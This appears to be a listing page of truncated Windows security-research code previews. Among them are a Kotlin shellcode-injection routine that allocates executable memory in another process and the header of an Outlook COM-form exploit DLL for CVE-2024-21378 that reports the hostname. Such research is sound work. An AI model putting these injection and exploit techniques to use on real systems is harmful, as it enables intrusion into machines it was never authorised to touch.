Standard escape codes are prefixed with Escape
:
- Ctrl-Key:
^[
- Octal:
\033
- Unicode:
\u001b
- Hexadecimal:
\x1B
- Decimal:
27
#include <windows.h> | |
int main() { | |
HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL); | |
if (!file || file == INVALID_HANDLE_VALUE) { | |
return GetLastError(); | |
} | |
CloseHandle(file); | |
return 0; | |
} |
using System.Runtime.InteropServices; | |
using System; | |
/* | |
* Simple C# PoC to enable WebClient Service Programmatically | |
* Based on the C++ version from @tirannido (James Forshaw) | |
* Twitter: https://twitter.com/tiraniddo | |
* URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html | |
* | |
* Compile with: |
fun injectShellcode(vararg shellcode: Int) { | |
val length = shellcode.size | |
val hProcess = (lms!! as WindowsProcess).handle | |
val internalBlock = Kernel32.VirtualAllocEx(hProcess, 0, shellcode.size, | |
WinNT.MEM_COMMIT, WinNT.PAGE_EXECUTE_READWRITE) | |
val buffer = Memory(shellcode.size.toLong()) | |
for (i in 0..shellcode.lastIndex) buffer.setByte(i.toLong(), shellcode[i].toByte()) | |
#!/usr/bin/env python | |
# Impacket - Collection of Python classes for working with network protocols. | |
# | |
# Copyright Fortra, LLC and its affiliated companies | |
# | |
# All rights reserved. | |
# | |
# This software is provided under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. |
/** | |
* This DLL is designed for use in conjunction with the Ruler tool for | |
* security testing related to the CVE-2024-21378 vulnerability, | |
* specifically targeting MS Outlook. | |
* | |
* It can be used with the following command line syntax: | |
* ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
* Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
* | |
* After being loaded into MS Outlook, it sends the PC's hostname and |
filter Expand-DefenderAVSignatureDB { | |
<# | |
.SYNOPSIS | |
Decompresses a Windows Defender AV signature database (.VDM file). | |
.DESCRIPTION | |
Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
{ | |
"targets": [ | |
{ | |
"target_name": "hello", | |
"sources": [ "hello.cc" ] | |
} | |
] | |
} |
#include <Windows.h> | |
#include <winternl.h> | |
// Types | |
using LdrProtectMrdata_t = void(__stdcall*)(int); | |
using LdrProtectMrdataHeap_t = void(__thiscall*)(int); | |
struct ExceptionRecord_t { | |
LIST_ENTRY entry; | |
int* unknown_intptr; |
#include <stdio.h> | |
#include <windows.h> | |
#include <winternl.h> | |
#define dwAllowDllCount 1 | |
CHAR cAllowDlls[dwAllowDllCount][MAX_PATH] = { | |
"W:\\allowed.dll" | |
}; | |
VOID HookLoadDll(LPVOID lpAddr); |